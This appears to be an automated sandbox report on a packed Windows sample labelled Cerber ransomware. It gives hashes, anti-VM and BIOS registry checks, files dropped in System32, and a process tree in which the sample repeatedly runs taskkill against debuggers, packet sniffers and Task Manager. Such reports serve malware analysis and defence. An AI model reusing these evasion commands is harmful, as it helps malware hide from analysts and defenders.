cerber | f62d4ee2fb48f64e69bfbc3c2a467245da06b67feafe3fec54e4e80f5b32b350

Analysis

max time kernel
27s
max time network
32s
platform
windows10-2004_x64
resource
win10v2004-20250217-en
resource tags

arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system
submitted
07/03/2025, 16:31

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Karin Perm_protected.exe
Size

4.4MB
MD5

609bd04323c87ac5b9ef563bb517508d
SHA1

4bd292594f7e3867a3ae62f19b8a5728fb541aad
SHA256

f62d4ee2fb48f64e69bfbc3c2a467245da06b67feafe3fec54e4e80f5b32b350
SHA512

1e49def2e8c824a5bb9de3df1dec5a08a4a00cc988f3120d526e7ebfa261c937839b4318b7c3e8abba254946fd349531771d3d1c27295c3f9be97444e82a8e59
SSDEEP

98304:VbQ0IUsAcJNoQNUxyses8FmyqU2Yv35Dl6duhUt:VV+J2SUTmqUX9lHit

Score

10^/10

cerber defense_evasion ransomware themida trojan

Malware Config

Signatures

Cerber 64 IoCs

Cerber is a widely used ransomware-as-a-service (RaaS), first seen in 2017.

ransomware cerber

description	ioc	pid	Process
		3884	taskkill.exe
		2616	taskkill.exe
		3664	taskkill.exe
		4444	taskkill.exe
		4552	taskkill.exe
		4520	taskkill.exe
		2232	taskkill.exe
		4160	taskkill.exe
		1692	taskkill.exe
Mutant created	AFUWIN.{5b5b8120-cd0e-11d9-b61b-0001294c3bd8}		AMIDEWINx64.EXE
Mutant created	AFUWIN.{5b5b8120-cd0e-11d9-b61b-0001294c3bd8}		AMIDEWINx64.EXE
		4576	taskkill.exe
		1620	taskkill.exe
		1416	taskkill.exe
		2476	taskkill.exe
		2492	taskkill.exe
		2096	taskkill.exe
		4972	taskkill.exe
Mutant created	AFUWIN.{5b5b8120-cd0e-11d9-b61b-0001294c3bd8}		AMIDEWINx64.EXE
		1076	taskkill.exe
		1348	taskkill.exe
		1464	taskkill.exe
Mutant created	AFUWIN.{5b5b8120-cd0e-11d9-b61b-0001294c3bd8}		AMIDEWINx64.EXE
		316	taskkill.exe
		880	taskkill.exe
		4608	taskkill.exe
		2292	taskkill.exe
		1832	taskkill.exe
		3656	taskkill.exe
		4392	taskkill.exe
		1876	taskkill.exe
		2312	taskkill.exe
		1268	taskkill.exe
		1140	taskkill.exe
		4104	taskkill.exe
Mutant created	AFUWIN.{5b5b8120-cd0e-11d9-b61b-0001294c3bd8}		AMIDEWINx64.EXE
		4216	taskkill.exe
		1052	taskkill.exe
		2332	taskkill.exe
Mutant created	AFUWIN.{5b5b8120-cd0e-11d9-b61b-0001294c3bd8}		AMIDEWINx64.EXE
		1268	taskkill.exe
		628	taskkill.exe
		5080	taskkill.exe
		1692	taskkill.exe
		3892	taskkill.exe
		4012	taskkill.exe
		2256	taskkill.exe
		1156	taskkill.exe
		3720	taskkill.exe
		5080	taskkill.exe
		8	taskkill.exe
		4044	taskkill.exe
		4744	taskkill.exe
		4108	taskkill.exe
		3068	taskkill.exe
		1600	taskkill.exe
		4052	taskkill.exe
Mutant created	AFUWIN.{5b5b8120-cd0e-11d9-b61b-0001294c3bd8}		AMIDEWINx64.EXE
		2648	taskkill.exe
		2920	taskkill.exe
		552	taskkill.exe
		820	taskkill.exe
		5036	taskkill.exe
		1792	taskkill.exe

Cerber family
cerber

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs

defense_evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Karin Perm_protected.exe

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Karin Perm_protected.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Karin Perm_protected.exe

Executes dropped EXE 22 IoCs

pid	Process
3440	AMIDEWINx64.EXE
3152	AMIDEWINx64.EXE
4608	AMIDEWINx64.EXE
4216	AMIDEWINx64.EXE
3416	AMIDEWINx64.EXE
916	AMIDEWINx64.EXE
3640	AMIDEWINx64.EXE
1140	AMIDEWINx64.EXE
2044	AMIDEWINx64.EXE
1840	AMIDEWINx64.EXE
3272	AMIDEWINx64.EXE
396	AMIDEWINx64.EXE
1952	AMIDEWINx64.EXE
3868	AMIDEWINx64.EXE
4444	AMIDEWINx64.EXE
3964	AMIDEWINx64.EXE
3960	AMIDEWINx64.EXE
2964	AMIDEWINx64.EXE
3968	AMIDEWINx64.EXE
1792	AMIDEWINx64.EXE
2476	AMIDEWINx64.EXE
2840	AMIDEWINx64.EXE

Themida packer 7 IoCs

Detects Themida, an advanced Windows software protection system.

themida

resource	yara_rule
behavioral2/memory/2588-0-0x0000000140000000-0x0000000140BBF000-memory.dmp	themida
behavioral2/memory/2588-3-0x0000000140000000-0x0000000140BBF000-memory.dmp	themida
behavioral2/memory/2588-2-0x0000000140000000-0x0000000140BBF000-memory.dmp	themida
behavioral2/memory/2588-4-0x0000000140000000-0x0000000140BBF000-memory.dmp	themida
behavioral2/memory/2588-5-0x0000000140000000-0x0000000140BBF000-memory.dmp	themida
behavioral2/memory/2588-6-0x0000000140000000-0x0000000140BBF000-memory.dmp	themida
behavioral2/memory/2588-35-0x0000000140000000-0x0000000140BBF000-memory.dmp	themida

Checks whether UAC is enabled 1 TTPs 1 IoCs

defense_evasion trojan

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Karin Perm_protected.exe

Drops file in System32 directory 2 IoCs

description	ioc	Process
File created	C:\Windows\System32\amifldrv64.sys	Karin Perm_protected.exe
File created	C:\Windows\System32\AMIDEWINx64.EXE	Karin Perm_protected.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

pid	Process
2588	Karin Perm_protected.exe

Drops file in Program Files directory 1 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\EasyAntiCheat_EOS\gvi5ia.bat	curl.exe

Kills process with taskkill 64 IoCs

defense_evasion

pid	Process
3092	taskkill.exe
4548	taskkill.exe
2476	taskkill.exe
2388	taskkill.exe
2252	taskkill.exe
3720	taskkill.exe
5092	taskkill.exe
2648	taskkill.exe
3244	taskkill.exe
940	taskkill.exe
4624	taskkill.exe
3432	taskkill.exe
4724	taskkill.exe
3640	taskkill.exe
2492	taskkill.exe
4160	taskkill.exe
2648	taskkill.exe
2148	taskkill.exe
1464	taskkill.exe
5080	taskkill.exe
1432	taskkill.exe
5000	taskkill.exe
4108	taskkill.exe
768	taskkill.exe
4792	taskkill.exe
1156	taskkill.exe
4616	taskkill.exe
4052	taskkill.exe
1920	taskkill.exe
4576	taskkill.exe
3120	taskkill.exe
540	taskkill.exe
1436	taskkill.exe
1832	taskkill.exe
4404	taskkill.exe
1392	taskkill.exe
3536	taskkill.exe
2224	taskkill.exe
2692	taskkill.exe
632	taskkill.exe
396	taskkill.exe
1248	taskkill.exe
1936	taskkill.exe
1076	taskkill.exe
8	taskkill.exe
4012	taskkill.exe
3372	taskkill.exe
4160	taskkill.exe
2492	taskkill.exe
3656	taskkill.exe
3664	taskkill.exe
4216	taskkill.exe
3504	taskkill.exe
4972	taskkill.exe
1124	taskkill.exe
4420	taskkill.exe
1548	taskkill.exe
5056	taskkill.exe
4444	taskkill.exe
2764	taskkill.exe
2332	taskkill.exe
5040	taskkill.exe
4700	taskkill.exe
4972	taskkill.exe

Suspicious behavior: EnumeratesProcesses 10 IoCs

pid	Process
2588	Karin Perm_protected.exe
2588	Karin Perm_protected.exe
2588	Karin Perm_protected.exe
2588	Karin Perm_protected.exe
2588	Karin Perm_protected.exe
2588	Karin Perm_protected.exe
2588	Karin Perm_protected.exe
2588	Karin Perm_protected.exe
2588	Karin Perm_protected.exe
2588	Karin Perm_protected.exe

Suspicious behavior: LoadsDriver 22 IoCs

pid	Process
660	Process not Found
660	Process not Found
660	Process not Found
660	Process not Found
660	Process not Found
660	Process not Found
660	Process not Found
660	Process not Found
660	Process not Found
660	Process not Found
660	Process not Found
660	Process not Found
660	Process not Found
660	Process not Found
660	Process not Found
660	Process not Found
660	Process not Found
660	Process not Found
660	Process not Found
660	Process not Found
660	Process not Found
660	Process not Found

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1124	taskkill.exe
Token: SeDebugPrivilege	3904	taskkill.exe
Token: SeDebugPrivilege	5080	taskkill.exe
Token: SeDebugPrivilege	1996	taskkill.exe
Token: SeDebugPrivilege	2252	taskkill.exe
Token: SeDebugPrivilege	396	taskkill.exe
Token: SeDebugPrivilege	316	taskkill.exe
Token: SeDebugPrivilege	1464	taskkill.exe
Token: SeDebugPrivilege	1600	taskkill.exe
Token: SeDebugPrivilege	4420	taskkill.exe
Token: SeDebugPrivilege	1248	taskkill.exe
Token: SeDebugPrivilege	4608	taskkill.exe
Token: SeDebugPrivilege	3372	taskkill.exe
Token: SeDebugPrivilege	1156	taskkill.exe
Token: SeDebugPrivilege	2292	taskkill.exe
Token: SeDebugPrivilege	5036	taskkill.exe
Token: SeDebugPrivilege	3068	taskkill.exe
Token: SeDebugPrivilege	3640	taskkill.exe
Token: SeDebugPrivilege	4980	taskkill.exe
Token: SeDebugPrivilege	2388	taskkill.exe
Token: SeDebugPrivilege	1052	taskkill.exe
Token: SeDebugPrivilege	4576	taskkill.exe
Token: SeDebugPrivilege	1104	taskkill.exe
Token: SeDebugPrivilege	2232	taskkill.exe
Token: SeDebugPrivilege	3532	taskkill.exe
Token: SeDebugPrivilege	2492	taskkill.exe
Token: SeDebugPrivilege	1936	taskkill.exe
Token: SeDebugPrivilege	3720	taskkill.exe
Token: SeDebugPrivilege	3736	taskkill.exe
Token: SeDebugPrivilege	1548	taskkill.exe
Token: SeDebugPrivilege	3892	taskkill.exe
Token: SeDebugPrivilege	1268	taskkill.exe
Token: SeDebugPrivilege	2292	taskkill.exe
Token: SeDebugPrivilege	5036	taskkill.exe
Token: SeDebugPrivilege	1692	taskkill.exe
Token: SeDebugPrivilege	3120	taskkill.exe
Token: SeDebugPrivilege	3948	taskkill.exe
Token: SeDebugPrivilege	2956	taskkill.exe
Token: SeDebugPrivilege	2096	taskkill.exe
Token: SeDebugPrivilege	4304	taskkill.exe
Token: SeDebugPrivilege	4624	taskkill.exe
Token: SeDebugPrivilege	4584	taskkill.exe
Token: SeDebugPrivilege	4160	taskkill.exe
Token: SeDebugPrivilege	540	taskkill.exe
Token: SeDebugPrivilege	628	taskkill.exe
Token: SeDebugPrivilege	1032	taskkill.exe
Token: SeDebugPrivilege	1876	taskkill.exe
Token: SeDebugPrivilege	4420	taskkill.exe
Token: SeDebugPrivilege	3024	taskkill.exe
Token: SeDebugPrivilege	4404	taskkill.exe
Token: SeDebugPrivilege	4724	taskkill.exe
Token: SeDebugPrivilege	2920	taskkill.exe
Token: SeDebugPrivilege	3968	taskkill.exe
Token: SeDebugPrivilege	4856	taskkill.exe
Token: SeDebugPrivilege	2256	taskkill.exe
Token: SeDebugPrivilege	5056	taskkill.exe
Token: SeDebugPrivilege	2536	taskkill.exe
Token: SeDebugPrivilege	5080	taskkill.exe
Token: SeDebugPrivilege	2388	taskkill.exe
Token: SeDebugPrivilege	4584	taskkill.exe
Token: SeDebugPrivilege	4160	taskkill.exe
Token: SeDebugPrivilege	552	taskkill.exe
Token: SeDebugPrivilege	8	taskkill.exe
Token: SeDebugPrivilege	4012	taskkill.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2588 wrote to memory of 924	2588	Karin Perm_protected.exe	96
PID 2588 wrote to memory of 924	2588	Karin Perm_protected.exe	96
PID 924 wrote to memory of 1124	924	cmd.exe	97
PID 924 wrote to memory of 1124	924	cmd.exe	97
PID 2588 wrote to memory of 2464	2588	Karin Perm_protected.exe	99
PID 2588 wrote to memory of 2464	2588	Karin Perm_protected.exe	99
PID 2464 wrote to memory of 3904	2464	cmd.exe	100
PID 2464 wrote to memory of 3904	2464	cmd.exe	100
PID 2588 wrote to memory of 2840	2588	Karin Perm_protected.exe	101
PID 2588 wrote to memory of 2840	2588	Karin Perm_protected.exe	101
PID 2840 wrote to memory of 5080	2840	cmd.exe	102
PID 2840 wrote to memory of 5080	2840	cmd.exe	102
PID 2588 wrote to memory of 4072	2588	Karin Perm_protected.exe	103
PID 2588 wrote to memory of 4072	2588	Karin Perm_protected.exe	103
PID 4072 wrote to memory of 1996	4072	cmd.exe	104
PID 4072 wrote to memory of 1996	4072	cmd.exe	104
PID 2588 wrote to memory of 4736	2588	Karin Perm_protected.exe	105
PID 2588 wrote to memory of 4736	2588	Karin Perm_protected.exe	105
PID 4736 wrote to memory of 2252	4736	cmd.exe	106
PID 4736 wrote to memory of 2252	4736	cmd.exe	106
PID 2588 wrote to memory of 3440	2588	Karin Perm_protected.exe	108
PID 2588 wrote to memory of 3440	2588	Karin Perm_protected.exe	108
PID 3440 wrote to memory of 396	3440	cmd.exe	109
PID 3440 wrote to memory of 396	3440	cmd.exe	109
PID 2588 wrote to memory of 4548	2588	Karin Perm_protected.exe	110
PID 2588 wrote to memory of 4548	2588	Karin Perm_protected.exe	110
PID 4548 wrote to memory of 316	4548	cmd.exe	111
PID 4548 wrote to memory of 316	4548	cmd.exe	111
PID 2588 wrote to memory of 1028	2588	Karin Perm_protected.exe	112
PID 2588 wrote to memory of 1028	2588	Karin Perm_protected.exe	112
PID 1028 wrote to memory of 1464	1028	cmd.exe	113
PID 1028 wrote to memory of 1464	1028	cmd.exe	113
PID 2588 wrote to memory of 3152	2588	Karin Perm_protected.exe	114
PID 2588 wrote to memory of 3152	2588	Karin Perm_protected.exe	114
PID 3152 wrote to memory of 1600	3152	cmd.exe	115
PID 3152 wrote to memory of 1600	3152	cmd.exe	115
PID 2588 wrote to memory of 2764	2588	Karin Perm_protected.exe	116
PID 2588 wrote to memory of 2764	2588	Karin Perm_protected.exe	116
PID 2764 wrote to memory of 4420	2764	cmd.exe	117
PID 2764 wrote to memory of 4420	2764	cmd.exe	117
PID 2588 wrote to memory of 3540	2588	Karin Perm_protected.exe	118
PID 2588 wrote to memory of 3540	2588	Karin Perm_protected.exe	118
PID 2588 wrote to memory of 4704	2588	Karin Perm_protected.exe	119
PID 2588 wrote to memory of 4704	2588	Karin Perm_protected.exe	119
PID 4704 wrote to memory of 1248	4704	cmd.exe	120
PID 4704 wrote to memory of 1248	4704	cmd.exe	120
PID 2588 wrote to memory of 2992	2588	Karin Perm_protected.exe	121
PID 2588 wrote to memory of 2992	2588	Karin Perm_protected.exe	121
PID 2992 wrote to memory of 4608	2992	cmd.exe	122
PID 2992 wrote to memory of 4608	2992	cmd.exe	122
PID 2588 wrote to memory of 3616	2588	Karin Perm_protected.exe	123
PID 2588 wrote to memory of 3616	2588	Karin Perm_protected.exe	123
PID 3616 wrote to memory of 3372	3616	cmd.exe	124
PID 3616 wrote to memory of 3372	3616	cmd.exe	124
PID 2588 wrote to memory of 4040	2588	Karin Perm_protected.exe	125
PID 2588 wrote to memory of 4040	2588	Karin Perm_protected.exe	125
PID 4040 wrote to memory of 1156	4040	cmd.exe	126
PID 4040 wrote to memory of 1156	4040	cmd.exe	126
PID 2588 wrote to memory of 656	2588	Karin Perm_protected.exe	127
PID 2588 wrote to memory of 656	2588	Karin Perm_protected.exe	127
PID 656 wrote to memory of 1268	656	cmd.exe	128
PID 656 wrote to memory of 1268	656	cmd.exe	128
PID 2588 wrote to memory of 940	2588	Karin Perm_protected.exe	129
PID 2588 wrote to memory of 940	2588	Karin Perm_protected.exe	129

C:\Users\Admin\AppData\Local\Temp\Karin Perm_protected.exe
"C:\Users\Admin\AppData\Local\Temp\Karin Perm_protected.exe"
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Drops file in System32 directory
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2588
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im KsDumperClient.exe >nul 2>&1
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:924
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im KsDumperClient.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1124
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im KsDumper.exe >nul 2>&1
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2464
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im KsDumper.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3904
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&1
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2840
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebuggerUI.exe
    3⤵
    - Cerber
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:5080
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4072
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebuggerSvc.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1996
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im ProcessHacker.exe >nul 2>&1
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4736
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im ProcessHacker.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2252
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im idaq.exe >nul 2>&1
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3440
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im idaq.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:396
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im idaq64.exe >nul 2>&1
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4548
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im idaq64.exe
    3⤵
    - Cerber
    - Suspicious use of AdjustPrivilegeToken
    PID:316
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Wireshark.exe >nul 2>&1
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1028
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Wireshark.exe
    3⤵
    - Cerber
    - Suspicious use of AdjustPrivilegeToken
    PID:1464
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Fiddler.exe >nul 2>&1
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3152
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Fiddler.exe
    3⤵
    - Cerber
    - Suspicious use of AdjustPrivilegeToken
    PID:1600
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FiddlerEverywhere.exe >nul 2>&1
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2764
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FiddlerEverywhere.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:4420
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:3540
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Xenos64.exe >nul 2>&1
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4704
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Xenos64.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1248
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Xenos.exe >nul 2>&1
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2992
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Xenos.exe
    3⤵
    - Cerber
    - Suspicious use of AdjustPrivilegeToken
    PID:4608
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Xenos32.exe >nul 2>&1
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3616
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Xenos32.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:3372
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im de4dot.exe >nul 2>&1
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4040
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im de4dot.exe
    3⤵
    - Cerber
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1156
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Cheat Engine.exe >nul 2>&1
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:656
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Cheat Engine.exe
    3⤵
    - Cerber
    PID:1268
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im cheatengine-x86_64.exe >nul 2>&1
  2⤵
  PID:940
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im cheatengine-x86_64.exe
    3⤵
    - Cerber
    - Suspicious use of AdjustPrivilegeToken
    PID:2292
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im cheatengine-x86_64-SSE4-AVX2.exe >nul 2>&1
  2⤵
  PID:3820
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im cheatengine-x86_64-SSE4-AVX2.exe
    3⤵
    - Cerber
    - Suspicious use of AdjustPrivilegeToken
    PID:5036
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im MugenJinFuu-x86_64-SSE4-AVX2.exe >nul 2>&1
  2⤵
  PID:1832
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im MugenJinFuu-x86_64-SSE4-AVX2.exe
    3⤵
    - Cerber
    - Suspicious use of AdjustPrivilegeToken
    PID:3068
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im MugenJinFuu-i386.exe >nul 2>&1
  2⤵
  PID:1640
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im MugenJinFuu-i386.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:3640
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im cheatengine-x86_64.exe >nul 2>&1
  2⤵
  PID:4304
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im cheatengine-x86_64.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4980
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im cheatengine-i386.exe >nul 2>&1
  2⤵
  PID:4624
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im cheatengine-i386.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2388
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTP Debugger Windows Service (32 bit).exe >nul 2>&1
  2⤵
  PID:1348
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTP Debugger Windows Service (32 bit).exe
    3⤵
    - Kills process with taskkill
    PID:4700
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im KsDumper.exe >nul 2>&1
  2⤵
  PID:2840
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im KsDumper.exe
    3⤵
    - Cerber
    - Suspicious use of AdjustPrivilegeToken
    PID:1052
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im OllyDbg.exe >nul 2>&1
  2⤵
  PID:2440
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im OllyDbg.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4576
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im x64dbg.exe >nul 2>&1
  2⤵
  PID:1916
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im x64dbg.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1104
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im x32dbg.exe >nul 2>&1
  2⤵
  PID:440
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im x32dbg.exe
    3⤵
    - Cerber
    - Suspicious use of AdjustPrivilegeToken
    PID:2232
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1
  2⤵
  PID:4548
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3532
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&1
  2⤵
  PID:3656
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebuggerUI.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2492
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1
  2⤵
  PID:4636
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebuggerSvc.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1936
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Ida64.exe >nul 2>&1
  2⤵
  PID:4412
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Ida64.exe
    3⤵
    - Cerber
    - Suspicious use of AdjustPrivilegeToken
    PID:3720
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im OllyDbg.exe >nul 2>&1
  2⤵
  PID:3052
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im OllyDbg.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3736
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Dbg64.exe >nul 2>&1
  2⤵
  PID:1724
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Dbg64.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1548
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Dbg32.exe >nul 2>&1
  2⤵
  PID:3504
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Dbg32.exe
    3⤵
    - Cerber
    - Suspicious use of AdjustPrivilegeToken
    PID:3892
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Taskmgr.exe >nul 2>&1
  2⤵
  PID:4040
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Taskmgr.exe
    3⤵
    - Cerber
    - Suspicious use of AdjustPrivilegeToken
    PID:1268
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&1
  2⤵
  PID:4348
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2292
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1
  2⤵
  PID:1668
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:5036
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&1
  2⤵
  PID:916
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1692
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im KsDumperClient.exe >nul 2>&1
  2⤵
  PID:4332
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im KsDumperClient.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:3120
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im KsDumper.exe >nul 2>&1
  2⤵
  PID:4628
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im KsDumper.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3948
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&1
  2⤵
  PID:448
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebuggerUI.exe
    3⤵
